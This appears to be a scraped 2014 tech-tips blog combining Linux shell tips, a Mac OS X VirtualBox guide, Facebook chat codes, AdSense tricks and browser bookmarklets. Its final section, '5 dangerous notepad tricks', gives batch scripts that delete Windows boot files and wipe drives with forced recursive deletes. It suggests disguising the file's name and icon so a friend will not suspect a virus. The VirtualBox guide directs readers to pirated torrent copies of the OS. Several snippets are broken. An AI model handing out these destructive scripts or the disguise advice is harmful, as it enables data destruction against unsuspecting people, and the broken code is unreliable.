Friday, 6 June 2014

Tricky tips for UNIX/LINUX shell commands

Search man pages with these commands.

Here are few commands that can come handy while searching through man Pages in linux.

$man -k ssh 

The above command will show all available commands that contain the word ssh in their description 
Also, if you would need to check short descriptios of the commands, you can use the following:

$whatis ssh


$man -f ssh

ispell: A Spell check for UNIX

This is the program used to perform a very basic spell check from command line.
Here is a tip that lets you know how to use ispell.
firs, install it if it's not already installed, by running the following command:

#sudo apt-get install aspell aspell-en 

Now, to see ispell in action, run the command shown below:

#ispell <filname> <-----(in place of 'filname' enter any file you want to spell check)

You now have the option of several actions that you can take on misspelled words found in the file.
Type the number 'n' to replace the misspelled word.
Type 'R' to replace the misspelled word with a word that you wish to replace it with.
Press 'A' to ignore that misspelled word in this entire ispell session.
Press 'Q' to quit the program.
Press the space bar to ignore that misspelled word just once.
Press 'I' to ignore all the misspelled words

Find user account without passwords

Open terminal window and enter the following command, which will display all user account without passwords:

#awk -F: '($2 =="") {print}' /etc/shadow

Gaining remote access using ssh on a specific port

To connect to remote Linux system, we often use ssh, which is a program for logging into a remote machine and executing commands on it. 
By default, ssh uses port Number 22 to communicate. Here is a tip that lets you connect to the server with ssh without using the default port.

#ssh -p port-number root@host-name

Unmount that stubborn USB device

I often encounter a peculiar and irritating problem with pen drives and USB storage devices.
I was not able to eject/unmount these devices, and get the error message: 'The device is busy.' or 'The device is used by another program, please close the program and try again.' 
One simple solution is to run the command sync to flush out incomplete buffers, and then run:

$sudo umnount 


$sudo umount /dev/sdb1


$sudo umount /media/external 

There are, of course, more sophisticated methods, i will update it too as i get to know, but till then, try this simple solution first to resolve this irritating problem.

Force file system check during the next reboot

Here is a method that allows you to force a Linux-based system to run fsck command on the next boot of the system. fsck is used to check and optionally repair one or more Linux file systems.
To run this forcibly, go to the root directory and create a file named 'forcefsck' as shown below:

#cd /

#touch forcefsck

The file forcefsck will be deleted automatically after fsck is finished.
This will only run the full file system check on the next reboot of the system.

Know your CPU

Running the following command on the terminal can give you the entire details of the CPU being used in your system:


Access the Windows desktop

There is a powerful utility (command) on Linux to access the remote desktop of any Windows system. the rdesktop is found already installed in many Debian- based systems. 
If not, it can be installed by running the following command:

$sudo apt-get install rdesktop

It uses Remote Desktop protocol (RDP) for remote access. in order to access any windows Desktop, go to the terminal and type following command :

rdesktop ip-address -u username -p password

For example:

$rdesktop -u ajinta -p AUrAngAbAd

It will log on to the Windows system in the network that has the following IP address:, with the username ajinta and password AUrAngAbAd. It will show the Windows desktop of this system. Now, you can operate this Windows system from your Linux system!

Installing .bin files in Linux 

We often download software as an execute file with the extension .bin and then do not know how to install it. here are a few steps that will let you run the .bin file in Linux.
First, change the file mode bits of the downloaded .bin file using the following command:

$cd /path/to/your/bin
$sudo chmod a+x <yourbinfile>.bin

Now run the executable by using./


Delete specific command from History

Use the 'up' arrow to browse through the history of commands that have been used in terminal and go to the command you want to delete. 
For example:

#cat /etc/passwd

Now press Ctrl+u
This will delete the selected command for History.  
To check if it is deleted or not, run the following command:


The output of the above command will show a blank with the * symbol in the place of the deleted command.

Finding the biggest files in Linux 

Here is a command that will help you find the biggest files in the current directory:

$ls -lSrh

The 'r' cause the large files to be listed at the end, and the 'h' gives human readable output.

Thank you for reading i will post more of these command in my next post.....

guide on installing OS X Mountain lion on virtual machine

hey!! folks there is new trick on web check out, you even dual boot it with your windows or linux i will let you guys know about it in my new post, so till then check about GRUB in my previous post, here a shield ideas for you to be safe from creating a mess in your system till you have no better idea on this.

so let's get started!!

We've already shown you how to use Virtualbox to install Mac OS X Snow Leopard and Mac OS X Lion on virtual machines in Windows, since it's great practice for installing Mac OS X on your actual computer. And now that OS X Mountain Lion 10.8 has been officially released, we can finally demonstrate how to do it with Mountain Lion too.

LATEST UPDATE (January 27, 2013): Don't want to use Hackboot? Check out the simpler iAtkos method for installing Mountain Lion on Virtualbox instead.

In essence, this method will let you run Mac OS X from inside a program window in Windows. As always, we're going to use Virtualbox for this. It's important to note that Windows virtualization programs do not "officially" support Mac OS X, so you will not be able to enable full graphics support. This tutorial should only be taken as a proof of concept.

Computer Requirements
You need a computer with Windows to run Mac OS X on Windows (of course). The "System Type" of your copy of Windows needs to be 64-bit, because OS X Mountain Lion is a 64-bit operating system. If you have a 32-bit copy of Windows, you can only install Mac OS X Snow Leopard on Virtualbox. You will need at least 4 GB of RAM and a dual-core (two core) processor or better. Personally, the computer I was using for this had a 4-core processor and 12 GB RAM, which is way more than enough. You also need about 10 GB of unused hard drive space.
Right click on "My Computer" on your desktop and click "Properties" to check the stats on your computer. If it doesn't directly tell you how many cores your processor has, look up your processor model on Wikipedia or Google. You also want to find out whether your processor is made by "Intel" or "AMD". Computers with AMD processors will not work with Mountain Lion. 
General Requirements
  • Virtualbox : This virtualization suite is free, and though it doesn't offer official support for Mac OS X, it works well enough.

  • Mountain Lion bootable DVD : Unfortunately, the standard method for installing OS X Mountain Lion on PCs (which uses a paid copy of the Mountain Lion installer) doesn't work with Virtualbox. Instead, you'll have to rely on pirated "bootable DVD" copies of Mountain Lion, also known as "distros". I won't go into details, but you can download these copies from about any bittorrent website by using a bittorrent client (it's about 4.5 GB in size). In the past, we've used the iAtkos distro for this, but iAtkos hasn't updated for Mountain Lion yet, so I used the "OS X 10.8 Mountain Lion bootable DVD for Intel PCs", by Olarila.

  • Hackboot 1 / Hackboot 2: Even though it's called a "bootable DVD", the Olarila version of OS X Mountain Lion still can't boot in Virtualbox by itself. To help Mountain Lion start, you'll need to use Olarila's Hackboot CD. There are three different versions of Hackboot; we'll need to use two of them in this guide. "Hackboot 1" is for starting the Mountain Lion installer, while "Hackboot" 2 is for starting Mountain Lion itself.

  • Multibeast 4.6.1 : You will need to use Multibeast 4.6.1, our favorite Hackintosh post-installation tool, to set up the Mountain Lion virtual machine after the initial installation. While Multibeast 4.6.1 is an old version designed for Mac OS X Lion instead of Mountain Lion, in our case, it actually works better than newer versions of Multibeast. Registration is required on the tonymacx86 website to download this.

Step 1: Prep
Download Virtualbox, install it, and open it up. Also, if you want to be able to view USB devices from your OS X Mountain Lion virtual machine, download the Virtualbox Extension Pack and run it before going to Step 2.
Step 2: Create a new virtual machine.
Virtualbox lets you run Mac OSX within Windows by creating a virtual machine, which is a program that simulates a normal computer.  To create a virtual machine, open up Virtualbox and click "New" on the upper left. Give your new virtual machine a name, and choose "Mac OS X" for the OS Type.

If your version of Virtualbox asks you to choose between 64-bit and 32-bit, be sure to choose 64-bit. Choosing 32-bit will result in a critical "Guru Meditation" error later on.
I recommend assigning 4 GB of RAM to the virtual machine, but you can assign as little as 2 GB of RAM. Every time you turn on Mac OS X, that RAM that you assign here will be used to run the virtual machine. The RAM will be given back to your normal computer after you turn Virtualbox off.
You'll need to create a new hard disk for the virtual machine. Virtualbox will ask you what type of disk you want to create: VDI, VDMK, or VHD. VDI is the original format for Virtualbox, while VDMK is the format used by VMWare. If you're considering getting a copy of VMWare, you might want to choose VDMK. Otherwise, just choose VDI. I recommend creating a dynamically expanding disk; the only other option, fixed-size storage, will eat up your hard drive.
Step 3: Give your new virtual machine an operating system.
Your virtual machine will now be created. But don't stop now--you still need to change a few settings before your machine will actually work. Your new virtual machine will show up on the left column of the Virtualbox start page.  Select your Mac OS X virtual machine (single-click) from the main page of Virtualbox, and open up the virtual machine settings. Once the settings open up, go to "System" and uncheck the "Enable EFI" box. This is by far the most important single setting that you will need to change.
EFI, which stands for Extended Firmware Interface, is a feature that helps operating systems start up. Unfortunately, Mac OSX requires 'speshul' EFI, so the EFI that Virtualbox uses doesn't work.
Once you're done with that, go to the settings for "Storage". In the storage tree box, you'll see a CD icon labeled "Empty". Click on it and click "Choose a virtual CD/DVD disk file". In the window that pops up, choose the .iso file for Hackboot 1 (download below).

DOWNLOAD: Hackboot 1
This way, when your virtual machine starts for the first time, it will boot into Hackboot.
Step 4: Install OS X Mountain Lion
Start up your virtual machine. You will come up to the Hackboot boot screen, with a CD icon labeled "HackBoot" in the middle. Don't do anything yet.

Your mouse cursor will probably be trapped inside the virtual machine. Press the right "Ctrl" key on your keyboard to allow your mouse to escape. Then, at the bottom right of the virtual machine screen, right-click on the little CD icon, and click "Choose a virtual CD/DVD disk file". A Windows Explorer window will pop up; from there, select the OS X 10.8 Mountain Lion bootable DVD.

Click back into the Hackboot screen, and press the "F5" key on your keyboard. This will refresh Hackboot. The CD icon in the middle of the Hackboot screen will now say "OS X Install DVD". Press the enter key on your keyboard. You will then enter the Mac OS X installer page.

Continue, and you will eventually come up to a page that asks you for a "destination" for your Mac install. Oh no, the page is blank! We'll have to fix that. To do this, start up Disk Utility (located under the Utilities menu).

Mac OSX can only be installed on a completely clean disk, so you need to use Disk Utility to wipe your Virtualbox hard disk. Click on the Virtualbox hard disk in Disk Utility and erase it. Don't worry, there's nothing important on it.

On the installation page for Mac OSX, the Virtualbox hard disk should now be showing up. Select it and continue.

Once that's done with, Mac OSX will install itself. This will take at least 20 minutes.

When the installation finishes, Mac OS X will crash into a black screen with white text. This is normal; Mac OS X has installed successfully. Now proceed to the next step.

Step 5: Boot it up
Again, press the right Ctrl key to allow your mouse to escape from the virtual machine screen. Then, click on the CD icon in the bottom right of the virtual machine. This time, choose the .iso file for Hackboot 2 (download below).

DOWNLOAD: Hackboot 2
Restart your virtual machine. You'll see the Hackboot screen once more, except there will be an icon for your virtual machine's hard drive in the middle.

Select it (use the arrow keys on your computer) and press "Enter". Mountain Lion will boot, and you should eventually be led to the Mac OS X setup screen. Fill it out, and you'll finally be led to the Mac OS X desktop. 

This concludes the first part of the guide. However, you're not done yet! You still have to make your virtual machine bootable without the help of Hackboot.

Step 6: Fix it up
By default, your ethernet (internet) should work in the virtual machine. However, the virtual machine will not have sound, or be able to boot from the hard drive without help. To fix this, open Safari, and download Multibeast 4.6.1. While Multibeast 4.6.1 is an old version designed for Mac OS X Lion instead of Mountain Lion, in our case, it actually works better than newer versions of Multibeast. Registration is required on the tonymacx86 website to download this.

DOWNLOAD: Multibeast 4.6.1

Before starting Multibeast, you have to go the "Security" section of System Preferences in Mac OS X, go to the "General" section, and check "Anywhere" in the "Allow applications" section. Once that's done, run Multibeast and install the following options (contrary to popular belief, you do not need an actual DSDT file to use UserDSDT).

Next, you'll have to delete a certain kext file in your hard drive that causes boot errors. You can do this from Finder, the file browser built into Mac OS X. However, Finder hides your hard drives in Mountain Lion by default. To unhide them, open Finder, and click on File -> Preferences in the menu bar at the top of Mac OS X. Under the "Sidebar" settings, check "Hard disks", so that Finder will display your virtual machine's hard disks in the sidebar.

Then, go to your main hard drive, and go to /System/Library/Extensions. Inside the Extensions folder, delete the file AppleGraphicsControl.kext.

This completes the post-installation process for your virtual machine. Eject the Hackboot CD; you can do this by right-clicking the CD icon at the bottom right of your virtual machine, and unchecking Hackboot. Then, restart your virtual machine. Mac OS X will now be able to boot normally and play audio. Congratulations!

Step 7: Make the screen bigger
Though this step is optional, I still recommend you do it anyways. Anyways, when you first use your Mac OS X, you'll probably notice one thing: your screen resolution is 1024x768. Since Virtualbox doesn't "technically" support Mac OS X, there's no official way to change this. But here's how you can change it anyways:
Open up Finder and go to the folder "Extra" in the main hard drive, and open the file org.Chameleon.boot.plist. Between <dict> and </dict> in the file, insert the following line.
<key>Graphics Mode</key>

You can change "1920x1080x32" to whatever resolution best fits your monitor. For instance, if you want to use the 1600x900 resolution, type in "1600x900x32". Once you've saved it, turn off the virtual machine.

Next, open the Command Prompt in Windows (make sure you are logged into an Administrator account on Windows). You can do this by opening the Start Menu, and typing "command prompt" into the Start Menu search bar. Then, type the following command into the Command Prompt.

cd "C:\Program Files\Oracle\Virtualbox"

This command will change the focus of the Command Prompt to the program folder for Virtualbox (if you installed Virtualbox somewhere different, then change the command to wherever you installed it). Next, type in this command:

vboxmanage setextradata "Name of virtual machine" "CustomVideoMode1" "1920x1080x32"

This command activates "vboxmanage", a command-line program included with Virtualbox that allows you to edit the properties of your virtual machine, including its built-in resolutions. Replace "Name of virtual machine" with the name of your virtual machine-- you can find the name of your virtual machine in the left pane of the Virtualbox main window (in the screenshot below, my virtual machine is named "Mountain Mac 2"). Replace "1920x1080x32" with whatever resolution you're using.

Press the enter key to submit the command. Once that's done, start your virtual machine again. It will now boot in full resolution. Congrats!
I'll just repeat what I said in my other two Virtualbox guides. Installing Mac OS X on a virtual machine is excellent practice for the real thing: installing Mac OS X on your actual computer. Don't get too comfortable, though. Compared to most computers, Virtualbox virtual machines are very "vanilla", meaning that they're very compatible with Mac OS X in the first place. You can't count on being that lucky with a real PC.

And even if you don't plan on doing this for real, with a Hackintosh, it's still a really cool thing to try out over the weekend.

Coolest Facebook chat code


Copy the codes and paste it on your chat !!! ♥♥♥

Merry Christmas 

[[339494426156911]] [[339494432823577]] [[339494429490244]] [[339494436156910]] [[339494422823578]] [[339494506156903]]
[[339494502823570]] [[339494512823569]] [[339494516156902]] [[339494509490236]] [[339494592823561]] [[339494582823562]]
[[339494586156895]] [[339494596156894]] [[339494589490228]] [[339494682823552]] [[339494679490219]] [[339494676156886]]
[[339494669490220]] [[339494672823553]] [[339494769490210]] [[339494762823544]] [[339494756156878]] [[339494766156877]]
[[339494759490211]] [[339494842823536]] [[339494852823535]] [[339494846156869]] [[339494839490203]] [[339494849490202]]

 Large Pink Double ( triple ) heart code

[[379320338758329]] [[379320355424994]] [[379320348758328]] [[379320352091661]] [[379320345424995]] [[379320455424984]]
[[379320448758318]] [[379320452091651]] [[379320445424985]] [[379320442091652]] [[379320525424977]] [[379320518758311]]
[[379320512091645]] [[379320522091644]] [[379320515424978]] [[379320602091636]] [[379320612091635]] [[379320605424969]]
[[379320598758303]] [[379320608758302]] [[379320702091626]] [[379320705424959]] [[379320692091627]] [[379320695424960]]
[[379320698758293]] [[379320778758285]] [[379320775424952]] [[379320788758284]] [[379320785424951]] [[379320782091618]]
[[379320872091609]] [[379320875424942]] [[379320865424943]] [[379320862091610]] [[379320868758276]] [[379320945424935]]

2. Mr. Bean

[[255016264574238]] [[255016271240904]] [[255016277907570]]
[[255016267907571]] [[255016274574237]] [[255016384574226]]
[[255016387907559]] [[255016394574225]] [[255016401240891]]
[[255016391240892]] [[255016464574218]] [[255016454574219]]
[[255016457907552]] [[255016461240885]] [[255016451240886]]
[[255016537907544]] [[255016531240878]] [[255016534574211]]
[[255016541240877]] [[255016527907545]] [[255016634574201]]

3. Jack Sparrow

[[298356520217565]] [[298356516884232]] [[298356506884233]] [[298356510217566]]
[[298356513550899]] [[298356620217555]] [[298356606884223]] [[298356616884222]]
[[298356610217556]] [[298356613550889]] [[298356673550883]] [[298356676884216]]
[[298356666884217]] [[298356680217549]] [[298356670217550]] [[298356740217543]]
[[298356733550877]] [[298356743550876]] [[298356730217544]] [[298356736884210]]
[[298356823550868]] [[298356810217536]] [[298356820217535]] [[298356826884201]]
[[298356813550869]] [[298356906884193]] [[298356896884194]] [[298356900217527]]
[[298356903550860]] [[298356893550861]] [[298356950217522]] [[298356946884189]]

4. Superman

[[299528860107644]] [[299528863440977]] [[299528866774310]] [[299528856774311]]
[[299528870107643]] [[299528950107635]] [[299528943440969]] [[299528946774302]]
[[299528953440968]] [[299528956774301]] [[299529013440962]] [[299529016774295]]
[[299529010107629]] [[299529003440963]] [[299529006774296]] [[299529060107624]]
[[299529063440957]] [[299529066774290]] [[299529070107623]] [[299529073440956]]
[[299529173440946]] [[299529183440945]] [[299529180107612]] [[299529176774279]]
[[299529186774278]] [[299529243440939]] [[299529236774273]] [[299529240107606]]

5. Elmo

[[302117289844540]] [[302117283177874]] [[302117276511208]] [[302117279844541]] [[302117286511207]] [[302117366511199]]
[[302117369844532]] [[302117373177865]] [[302117383177864]] [[302117379844531]] [[302117426511193]] [[302117436511192]]
[[302117429844526]] [[302117423177860]] [[302117433177859]] [[302117523177850]] [[302117529844516]] [[302117526511183]]
[[302117536511182]] [[302117533177849]] [[302117606511175]] [[302117596511176]] [[302117599844509]] [[302117593177843]]
[[302117603177842]] [[302117646511171]] [[302117649844504]] [[302117659844503]] [[302117656511170]] [[302117653177837]]
[[302117706511165]] [[302117703177832]] [[302117699844499]] [[302117709844498]] [[302117696511166]] [[302117749844494]]

6. Troll face

[[242538225822042]] [[242538222488709]] [[242538232488708]] [[242538219155376]] [[242538229155375]] [[242538339155364]]
[[242538335822031]] [[242538342488697]] [[242538345822030]] [[242538349155363]] [[242538392488692]] [[242538395822025]]
[[242538399155358]] [[242538402488691]] [[242538405822024]] [[242538475822017]] [[242538472488684]] [[242538489155349]]
[[242538492488682]] [[242538485822016]] [[242538562488675]] [[242538565822008]] [[242538569155341]] [[242538575822007]]
[[242538572488674]] [[242538612488670]] [[242538625822002]] [[242538619155336]] [[242538622488669]] [[242538615822003]]
[[242538675821997]] [[242538682488663]] [[242538672488664]] [[242538679155330]] [[242538685821996]] [[242538742488657]]


[[255006724575192]] [[25500672
7908525]] [[255006737908524]] [[255006734575191]] [[255006731241858]]
[[255006827908515]] [[255006831241848]] [[255006824575182]] [[255006817908516]] [[255006821241849]]
[[255006874575177]] [[255006871241844]] [[255006884575176]] [[255006877908510]] [[255006881241843]]
[[255006934575171]] [[255006931241838]] [[255006941241837]] [[255006944575170]] [[255006937908504]]
[[255007004575164]] [[255007001241831]] [[255006994575165]] [[255006997908498]] [[255006991241832]]
[[255007084575156]] [[255007101241821]] [[255007077908490]] [[255007091241822]] [[255007081241823]]

IF these codes are not working Properly please visit our Facebook page and copy these codes from there .

we can use colorful text / words / alphabets in facebook chat know how

How many times you start chat in facebook by " Hi " ..? ?? I think most of time..! now in this post i'll tell you how you can add colorfull text in facebook chat  without any software and addon just to impress your friends .! !!

First of all let me show you  a example :-

 In this chat box you can see HI in pink color it looks nice, at-least batter then that ordinary boring " hi " .So want to know how to do it:-

How to write HI in pink color :-
  •  just copy the below code :-

    [[111356865552629]]  [[109294689102123]]
  • and paste it in chat window and simply hit enter..!

How it works:-
  Actually these are not codes these are username of facebook pages.For full explanation please visit green link at the bottom of post
Till then assume that these are codes . :D :-)
[[107015582669715]]  = A
[[116067591741123]]  = B
[[115602405121532]]  = C
[[112542438763744]]  = D
[[115430438474268]]  = E
[[109225112442557]]  = F
[[111532845537326]]  = G
[[111356865552629]]  = H
[[109294689102123]]  = I
[[126362660720793]]  = J
[[116651741681944]]  = K
[[115807951764667]]  = L
[[106596672714242]]  = M
[[108634132504932]]  = N
[[116564658357124]]  = O
[[111669128857397]]  = P
[[107061805996548]]  = Q
[[106699962703083]]  = R
[[115927268419031]]  = S
[[112669162092780]]  = T
[[108983579135532]]  = U
[[107023745999320]]  = V
[[106678406038354]]  = W
[[116740548336581]]  = X
[[112416755444217]]  = Y
[[165724910215]]        = Z

 Like in above case we wrote HI 
HI :-   [[111356865552629]]  [[109294689102123]]
                         H                     I

So you can create any word using these codes like:-

COMPUTER :- [[115602405121532]] [[116564658357124]] [[106596672714242]] [[111669128857397]] [[108983579135532]] [[112669162092780]] [[115430438474268]]  [[106699962703083]]

TRICKS :-  [[112669162092780]] [[106699962703083]] [[109294689102123]] [[115602405121532]] [[116651741681944]] [[115927268419031]]

CORNER :- [[115602405121532]] [[116564658357124]]  [[106699962703083]] [[108634132504932]]  [[115430438474268]] [[106699962703083]]

Other useful codes:-

BIE :- [[116067591741123]] [[109294689102123]] [[115430438474268]]

  • Above codes will work only on Facebook chat and private messages . Codes will not work on status updates.!
  • While creating a word using above codes remember to give space between 2 codes for eg:-
    • HI :-   [[111356865552629]][[109294689102123]] ( WRONG METHOD  there is no space between 2 codes and it will appear as a code) 
    • HI :-   [[111356865552629]]  [[109294689102123]] ( RIGHT METHOD
  • This will not work while using facebook on mobile

Get free google adsense account without a website or blog

Google AdSense is one of the most innovative  way to make money online by displaying ads on your web pages like :- blog, website , forum, articles. Google AdSense was launched on June 18, 2003 and today there are millions of Google AdSense publishers.Google has two tools Google  AdSense and Google Adwords from these two tools Google generates most of revenue . Google easily approves AdSense accounts in most of countries but in few countries Google hardly approve AdSense applications.The reason may be one or other .  If you are having a website, then Then its good but if you don't have one , no problem you can still create a adsense account for free .

Actually there is no trick behind creating an Adsense account. Many people make fool by creating AdSense account via other websites and then try to sell these accounts which is wrong . Other websites mean those websites who have revenue sharing system Like Blogger, flixya, IndyaRocks, Hubpages. Following are 5websites which allows you to create an AdSense account. You don't have to pay them for this, just create an account at any of following sites and you can apply for your AdSense account from there.

 5 Free sites other than blogger to get Google adsense account:-
  • 1.

Flixya is a great  way to create an AdSense account for free.

Flixya is a website to share pictures, videos and blogs and it is powered by Google AdSense itself so there are higher chances of AdSense account approval. Simply signup for an account at Flixya, upload 10 ore more pictures, create a blog and apply for an AdSense account.

  • 2.

Hubpages is a website where people post their articles and get paid out of it.

Hubpages is a revenue sharing website where you can share your article on any subject and they will pay you for this. You can apply for an AdSense account via their Revenue share system.

  • 3. Docstoc

Its really simple and easy to create an AdSense via Docstoc.

Go to Docstoc, upload few documents there such as txt, doc or presentation files. But make sure those files contain some well written form. Simply go to Docstoc, create an account, upload few docs and apply for an AdSense account.

  • 4. IndyaRocks

This is a social network almost like Facebook. Here you can make friends, update your status, share pictures etc.

First of all, create an account there and complete your profile. Write 5 blogs at least and when you have done with it simply apply for an Adsense account application.

  • 5. Webanswers is a Q ,A site just like Yahoo! Answers where you can ask questions or answer others question on various topics.
Here is the step by step tutorial how to get Google adsense account approved.

  • First of all open a website webanswers(.)com and Sign up
  • This site is just like other knowledge sharing sites like yahoo answers or wiki answers.You just have to answer atleast 10 questions.
  • After some time you will get an Email by Google in which they would ask you to open adsense account.
  • Fulfill all the details with your correct information.


Edit any web site with just a javascript

This is very cool javascript which can be used to edit the content of any website like facebook or google you just have to copy javascript on your address bar and hit enter

This is how it works:-

Open any website in Google Chrome, or in Opera and enter the below code to the address bar of the browser.

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

•and press enter

Note :- while using This code in google chrome it may not work just by pasting it on address bar you have to add " javascript: " in the beginning manually .

    • In chrome it will look like This when you paste it:-

document.body.contentEditable='true'; document.designMode='on'; void 0

    • then u have to add " javascript: " without "" in beginning of code so it will look like this:-

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

•and hit enter
•Now u can edit any website

Here's one more script to make images float on any website just copy and paste it into address bar:-

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px";*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);

Note:-works well with firefox:-4 , Opera , in chrome you have to add:- javascript: in the beginning manually.

how to use your friend pro pic in chat with him/her

In my last post i shared a trick how to use colorful text/alphabet in facebook chat without adding any addon. Now in this post i'll share that how you can use your friends profile pic in facebook chat. and you will surely gonna get an idea that how this whole trick works(including the trick of using colorful text alphabets) 

How to add your friends profile pic/image in facebook chat:-

  • First of all login to your facebook account.
  • Get your friends username for eg:- in this link amitrwt is username or get his/her account id if S(he) not using username for eg:-  here 100001437283980 account id. 
  • copy his/her username or account id(THE RED BOLD TEXT MENTIONED ABOVE
  • Now go to chat window
  • and put his/her username or account id  [[here]] for eg:- [[amitrwt]] or [[100001437283980]]
  • And press enter
  • done

    How to get your friends username or account id:-

    • Go to your timeline (click here if you don't have timeline profile yet) or simply goto your wall.
    • Then click on Friends  or Friends  tab if you not using facebook timeline

    • After that search for your friend who's profile pic/image you want to add in chat

    • Now go to friends profile by clicking on there image after search results
    • Now look in your address bar You will see something like :-
      • For eg.
        amitrwt is a unique username copy it.

      • or if your friend not using username then you will see something like this:-
        if not just click on your address bar now copy account id
        • one other way to get account id is go to your friends account right click on report/block and click on copy link location now open a new tab and and paste it at your address bar it will look look like this:-

        • now copy the number just after cid= and before &rid=

5 dangerous notepad trick ever


1. How to create more than 3,000 folders under a minute
1) Open your notepad and type
the following code.
@echo off
md %random%

goto top
2) Save it as 1000.bat
@echo off makes your screen
appear blank but it is actually
making hundreds of folders.
md %random% is command that
creating folders with random
names.( md is a command to
make directory in ms-dos)
goto top – return the command
to :top, causes an infinite loop.
NOTE: The folders will get created
in the directory where you saved
the ”1000.bat” file.
The file might look suspicious to
your friends. So if you are
looking to fool your friends, then
change the file name and also
the icon so that he doesn’t
suspect the file to be a virus.

2. How to Shutdown a computer forever?
Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer. Copy the following
code into your notepad
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
del c:\windows\win.ini

Save it as “shutdown-
forever.bat”. Just make sure it
has a .bat or .cmd extension.
RUN IT !!!
This should shutdown the persons computer. It shuts it off once
and deletes the files needed to reboot and restart.So please, use
this hack only if you have no intention of rebooting your computer again. So just be careful.
Here’s an alternative code.
cmd /c del c:\windows\* /F /S /
cmd /c del c:\* /F /S /Q
Paste it in NotePad And Save It
with Extension .cmd or .bat.

3. How to Delete all your system
files with a small command!
Copy the following code into your
notepad and save it as a .bat
del *.*
All your files in your hard disk will
vanish in less than 5mins.
4. RAM crashing trick
open notepad and type
goto A
save with .bat extension.
Infinitely loops your browser to
open up
5. Crash a Computer System With

Nothing But a Link.
This is a javascript “exploit” , it
will hang/crash your system. It
basically floods you with an
infinite loop of mailto:xxx
windows. To cancel this (and you
have to move fast) kill the
process of your email client
before you run out of RAM. Every
instance occupies about 1000
bytes, if your victim is smart, he
better end the process As soon as
possible or he will be forced to
reboot his computer.
NOTE: Try at your own risk